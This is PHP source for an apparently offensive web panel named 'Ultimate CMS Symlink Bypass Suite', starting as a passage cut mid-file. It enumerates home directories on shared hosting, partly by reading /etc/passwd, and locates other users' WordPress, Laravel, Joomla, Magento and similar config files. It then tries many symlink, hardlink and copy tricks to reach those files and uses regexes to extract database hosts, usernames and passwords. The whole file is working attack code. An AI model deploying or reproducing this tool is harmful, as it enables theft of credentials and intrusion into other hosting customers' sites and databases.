'; file_put_contents("$FOLDER/web.config", $webconfig); } // ============== 15+ SYMLINK BYPASS TECHNIQUES ============== function createSymlinkBypass($target, $linkname) { // Bersihkan target $target = str_replace('\\', '/', $target); $linkname = str_replace('\\', '/', $linkname); // Hapus jika sudah ada if(is_link($linkname) || file_exists($linkname)) { @unlink($linkname); } $techniques = [ // Teknik 1: Normal $target, // Teknik 2: Double slash bypass "//$target", "///$target", // Teknik 3: Directory traversal "/./$target", "/../$target", "./$target", "../$target", // Teknik 4: Realpath realpath($target) ?: $target, // Teknik 5: URL encoded urlencode($target), // Teknik 6: Mixed slash (Windows/Linux) str_replace('/', '\\', $target), str_replace('/', '//', $target), // Teknik 7: Null byte (old PHP) $target . chr(0), // Teknik 8: Space bypass $target . " ", " " . $target, // Teknik 9: Using environment variable getenv('DOCUMENT_ROOT') . $target, // Teknik 10: Using symlink to symlink (is_link($target) ? readlink($target) : $target), // Teknik 11: Proc/self/cwd (Linux) (strpos(PHP_OS, 'Linux') !== false ? "/proc/self/cwd$target" : $target), // Teknik 12: Using FTP wrapper "ftp://" . $target, // Teknik 13: Phar wrapper "phar://" . $target, // Teknik 14: Zip wrapper "zip://" . $target, // Teknik 15: Glob bypass "glob://$target", ]; // Coba semua teknik foreach($techniques as $tech) { @clearstatcache(); // Coba symlink if(@symlink($tech, $linkname)) { @chmod($linkname, 0777); return ['status' => true, 'technique' => $tech]; } // Coba hardlink (alternative) if(@link($tech, $linkname)) { @chmod($linkname, 0777); return ['status' => true, 'technique' => "HARDLINK: $tech"]; } // Coba copy + bind (last resort) if(@copy($tech, $linkname)) { @chmod($linkname, 0777); return ['status' => true, 'technique' => "COPY: $tech"]; } } return ['status' => false, 'technique' => 'none']; } // ============== ADVANCED CMS SCANNER ============== function scanAllHomes() { $homes = []; $possible_paths = [ '/home', '/home2', '/home3', '/home4', '/home5', '/home6', '/home7', '/home8', '/home9', '/home10', '/home11', '/home12', '/home13', '/home14', '/home15', '/home16', '/home17', '/home18', '/home19', '/home20', '/var/www', '/var/www/html', '/var/www/vhosts', '/www', '/public_html', '/domains', '/data/www', '/usr/local/www', '/srv/www' ]; foreach($possible_paths as $path) { if(@is_dir($path)) { $homes[] = $path; } } // Baca dari /etc/passwd if(@file_exists('/etc/passwd')) { $passwd = @file_get_contents('/etc/passwd'); if(preg_match_all('/home\/([^:\/]+)/', $passwd, $matches)) { foreach($matches[0] as $home) { if(@is_dir($home)) $homes[] = $home; } } } return array_unique($homes); } function scanCMSinHome($home) { $cms_list = []; if(!$handle = @opendir($home)) return $cms_list; while(false !== ($item = readdir($handle))) { if($item == '.' || $item == '..') continue; $user_path = "$home/$item"; if(!@is_dir($user_path)) continue; $web_paths = [ "$user_path/public_html", "$user_path/www", "$user_path/web", "$user_path/htdocs", "$user_path/httpdocs", "$user_path/html", "$user_path/site", "$user_path/website", "$user_path/domains", $user_path ]; foreach($web_paths as $web_path) { if(!@is_dir($web_path)) continue; // Scan berbagai CMS $cms_configs = [ // WordPress ['file' => 'wp-config.php', 'type' => 'WordPress', 'icon' => '⚙️', 'priority' => 1], ['file' => 'wp-config-sample.php', 'type' => 'WordPress (Sample)', 'icon' => '⚙️', 'priority' => 2], // Laravel ['file' => '.env', 'type' => 'Laravel', 'icon' => '🎯', 'priority' => 1], ['file' => 'config/database.php', 'type' => 'Laravel Config', 'icon' => '🎯', 'priority' => 2], // CodeIgniter ['file' => 'application/config/database.php', 'type' => 'CodeIgniter', 'icon' => '🔥', 'priority' => 1], ['file' => 'system/config/database.php', 'type' => 'CodeIgniter', 'icon' => '🔥', 'priority' => 2], // Joomla ['file' => 'configuration.php', 'type' => 'Joomla', 'icon' => '🌐', 'priority' => 1], // Drupal ['file' => 'sites/default/settings.php', 'type' => 'Drupal', 'icon' => '🐘', 'priority' => 1], ['file' => 'settings.php', 'type' => 'Drupal', 'icon' => '🐘', 'priority' => 2], // Magento ['file' => 'app/etc/env.php', 'type' => 'Magento', 'icon' => '🛒', 'priority' => 1], ['file' => 'app/etc/local.xml', 'type' => 'Magento 1', 'icon' => '🛒', 'priority' => 1], // PrestaShop ['file' => 'config/settings.inc.php', 'type' => 'PrestaShop', 'icon' => '🛍️', 'priority' => 1], // OpenCart ['file' => 'config.php', 'type' => 'OpenCart', 'icon' => '📦', 'priority' => 1], ['file' => 'admin/config.php', 'type' => 'OpenCart Admin', 'icon' => '📦', 'priority' => 2], // Symfony ['file' => '.env.local', 'type' => 'Symfony', 'icon' => '🎨', 'priority' => 1], ['file' => 'app/config/parameters.yml', 'type' => 'Symfony', 'icon' => '🎨', 'priority' => 2], // CakePHP ['file' => 'config/app.php', 'type' => 'CakePHP', 'icon' => '🍰', 'priority' => 1], ['file' => 'app/Config/database.php', 'type' => 'CakePHP', 'icon' => '🍰', 'priority' => 2], // Yii ['file' => 'protected/config/main.php', 'type' => 'Yii', 'icon' => '🟡', 'priority' => 1], ['file' => 'config/db.php', 'type' => 'Yii2', 'icon' => '🟡', 'priority' => 1], // Custom config files ['file' => 'config.php', 'type' => 'Generic Config', 'icon' => '📄', 'priority' => 3], ['file' => 'database.php', 'type' => 'Database Config', 'icon' => '🗄️', 'priority' => 3], ['file' => 'db.php', 'type' => 'Database Config', 'icon' => '🗄️', 'priority' => 3], ['file' => 'settings.php', 'type' => 'Settings', 'icon' => '⚙️', 'priority' => 3], ['file' => '.env.production', 'type' => 'Laravel Env', 'icon' => '🎯', 'priority' => 2], ['file' => '.env.staging', 'type' => 'Laravel Env', 'icon' => '🎯', 'priority' => 2], ]; foreach($cms_configs as $cms) { $config_path = "$web_path/{$cms['file']}"; if(@file_exists($config_path)) { $cms_list[] = [ 'user' => $item, 'type' => $cms['type'], 'config' => $config_path, 'path' => $web_path, 'icon' => $cms['icon'], 'priority' => $cms['priority'], 'filesize' => @filesize($config_path) ]; } } } } closedir($handle); // Sort by priority (higher priority first) usort($cms_list, function($a, $b) { return $a['priority'] - $b['priority']; }); return $cms_list; } // ============== ADVANCED DB EXTRACTOR ============== function extractDBinfo($filepath) { if(!@file_exists($filepath)) return ['error' => 'File not found']; $content = @file_get_contents($filepath); if(!$content) return ['error' => 'Cannot read file']; $info = [ 'type' => 'Unknown', 'db' => '', 'user' => '', 'pass' => '', 'host' => 'localhost', 'port' => '3306', 'charset' => '', 'prefix' => '' ]; // WordPress patterns if(preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m)) { $info['type'] = 'WordPress'; $info['db'] = $m[1]; preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]); preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]); preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]); preg_match("/define\s*\(\s*['\"]DB_CHARSET['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['charset'] = $m[1]); preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['prefix'] = $m[1]); } // Laravel patterns elseif(preg_match("/DB_DATABASE=([^\s\n]+)/i", $content, $m)) { $info['type'] = 'Laravel'; $info['db'] = trim($m[1], "'\""); preg_match("/DB_USERNAME=([^\s\n]+)/i", $content, $m) && ($info['user'] = trim($m[1], "'\"")); preg_match("/DB_PASSWORD=([^\s\n]+)/i", $content, $m) && ($info['pass'] = trim($m[1], "'\"")); preg_match("/DB_HOST=([^\s\n]+)/i", $content, $m) && ($info['host'] = trim($m[1], "'\"")); preg_match("/DB_PORT=([^\s\n]+)/i", $content, $m) && ($info['port'] = trim($m[1], "'\"")); } // CodeIgniter 3 patterns elseif(preg_match("/\\\$db\['default'\]\['database'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m)) { $info['type'] = 'CodeIgniter 3'; $info['db'] = $m[1]; preg_match("/\\\$db\['default'\]\['username'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]); preg_match("/\\\$db\['default'\]\['password'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]); preg_match("/\\\$db\['default'\]\['hostname'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]); } // Joomla patterns elseif(preg_match("/public\s+\\\$db\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m)) { $info['type'] = 'Joomla'; $info['db'] = $m[1]; preg_match("/public\s+\\\$user\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]); preg_match("/public\s+\\\$password\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]); preg_match("/public\s+\\\$host\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]); } // Drupal patterns elseif(preg_match("/\\\$databases\['default'\]\['default'\]\['database'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m)) { $info['type'] = 'Drupal'; $info['db'] = $m[1]; preg_match("/\\\$databases\['default'\]\['default'\]\['username'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]); preg_match("/\\\$databases\['default'\]\['default'\]\['password'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]); preg_match("/\\\$databases\['default'\]\['default'\]\['host'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]); } // Magento 2 patterns elseif(preg_match("/'dbname'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m)) { $info['type'] = 'Magento 2'; $info['db'] = $m[1]; preg_match("/'username'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]); preg_match("/'password'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]); preg_match("/'host'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]); } // Generic patterns (fallback) else { if(preg_match("/(?:database|dbname|db_name)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['db'] = $m[1]; if(preg_match("/(?:username|db_user|dbuser)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['user'] = $m[1]; if(preg_match("/(?:password|pass|db_pass|dbpass|pwd)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['pass'] = $m[1]; if(preg_match("/(?:host|db_host|dbhost)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['host'] = $m[1]; } // Clean up foreach($info as $key => $value) { $info[$key] = htmlspecialchars(trim($value, "'\" \t\n\r\0\x0B")); } return $info; } // ============== AJAX HANDLER ============== if(isset($_GET['action'])) { header('Content-Type: application/json'); switch($_GET['action']) { case 'scan': $homes = scanAllHomes(); $all_cms = []; foreach($homes as $home) { $cms_in_home = scanCMSinHome($home); $all_cms = array_merge($all_cms, $cms_in_home); } // Remove duplicates $unique = []; foreach($all_cms as $cms) { $key = $cms['config']; if(!isset($unique[$key])) $unique[$key] = $cms; } echo json_encode(array_values($unique)); break; case 'create': $target = $_GET['target'] ?? ''; if($target) { $linkname = $FOLDER . "/link_" . md5($target . microtime()) . "_" . rand(1000,9999); $result = createSymlinkBypass($target, $linkname); if($result['status']) { echo json_encode([ 'status' => 'success', 'link' => basename($linkname), 'technique' => $result['technique'], 'fullpath' => $linkname ]); } else { echo json_encode([ 'status' => 'error', 'message' => 'All 15+ bypass techniques failed', 'target' => $target ]); } } break; case 'view': $link = $_GET['link'] ?? ''; if($link && file_exists("$FOLDER/$link")) { $target = is_link("$FOLDER/$link") ? @readlink("$FOLDER/$link") : $link; if(@file_exists($target) || @is_link($target)) { $content = @file_get_contents($target); if($content !== false) { echo $content; } else { echo "Unable to read file content (maybe protected)"; } } else { echo "Target file not accessible: $target"; } } else { echo "Invalid symlink"; } break; case 'extract': $link = $_GET['link'] ?? ''; if($link && file_exists("$FOLDER/$link")) { $target = is_link("$FOLDER/$link") ? @readlink("$FOLDER/$link") : $link; $info = extractDBinfo($target); echo json_encode($info); } else { echo json_encode(['error' => 'Invalid link']); } break; case 'list': $links = []; if(is_dir($FOLDER)) { foreach(scandir($FOLDER) as $item) { if($item == '.' || $item == '..') continue; $path = "$FOLDER/$item"; $links[] = [ 'name' => $item, 'target' => is_link($path) ? @readlink($path) : $path, 'is_link' => is_link($path), 'size' => @filesize($path), 'created' => @date('Y-m-d H:i:s', filectime($path)) ]; } } echo json_encode($links); break; case 'delete': $link = $_GET['link'] ?? ''; if($link) { $path = "$FOLDER/$link"; if(is_link($path) || file_exists($path)) { @unlink($path); echo json_encode(['status' => 'deleted', 'link' => $link]); } else { echo json_encode(['status' => 'not found']); } } break; case 'bulk_create': $targets = json_decode($_GET['targets'] ?? '[]', true); $results = []; foreach($targets as $target) { $linkname = $FOLDER . "/bulk_" . md5($target) . ".link"; $result = createSymlinkBypass($target, $linkname); $results[] = [ 'target' => $target, 'status' => $result['status'], 'link' => $result['status'] ? basename($linkname) : null ]; } echo json_encode($results); break; } exit; } ?> 🚀 Ultimate CMS Symlink Bypass Suite v2.0

Ultimate Symlink Bypass Suite

Advanced CMS Scanner + 15+ Symlink Bypass Techniques

WordPress Laravel CodeIgniter Joomla Drupal Magento
PHP:
Symlink:
0
CMS Ditemukan
0
Symlink Aktif
0
DB Creds Ditemukan

Detected CMS Configurations

Click "FULL SCAN" to start scanning...

Active Symlinks

Database Credentials Extractor

Click "Extract DB" on any symlink

Bulk Actions

Advanced Symlink Bypass Suite | 15+ Techniques | Auto DB Extractor